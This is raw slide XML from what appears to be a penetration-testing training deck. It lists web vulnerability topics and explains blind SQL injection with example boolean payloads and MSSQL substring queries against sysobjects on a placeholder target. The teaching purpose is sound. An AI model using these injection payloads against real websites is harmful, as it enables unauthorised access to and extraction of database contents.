                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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1143000" y="167640"/>
            <a:ext cx="6937375" cy="1118553"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a: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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1706880"/>
            <a:ext cx="8153400" cy="4311650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="2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400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL injection depends on the error messages being visible to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="2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400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If the application uses the input, but doesn't display errors, it is still vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="2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400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It will just take a little more time and effort to exploit it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="2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400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is blind SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="2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400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The attacker uses "yes/no" questions to abuse the flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="739775" lvl="1" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="2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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If the SQL statement executes correctly, the site works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="739775" lvl="1" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="2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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If it doesn't, something is wrong with the SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="2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400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Adjusting the query moves the attacker through the database</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pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovering Blind SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1691640"/>
            <a:ext cx="8260080" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Look for Boolean behaviours in the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>They are found by looking for yes and no answers to the below examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>An example would be a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>catalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> page:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>index.php?itemid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>=9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Returns data about a specific item #9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>index.php?itemid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Returns a no item found message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>index.php?itemid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>=9' and 1=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>; --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Returns data about item #9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>index.php?itemid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>=9' and 1=0; --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Returns a no item found message</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a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>20 Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1706880"/>
            <a:ext cx="8199120" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Now we play a game using the yes/no answers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We ask questions of the DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind the differences between RDBMS systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Here we are targeting a MSSQL database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://example.tgt/index.php?ID=1\ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and substring ((select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> where \ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>='u'),1,1)&gt;'m'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://example.tgt/index.php?ID=1\ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and substring ((select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> where \ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>='u'),1,1)&lt;'s'</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pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Blind SQL Using Timing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143363" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1737360"/>
            <a:ext cx="8016240" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
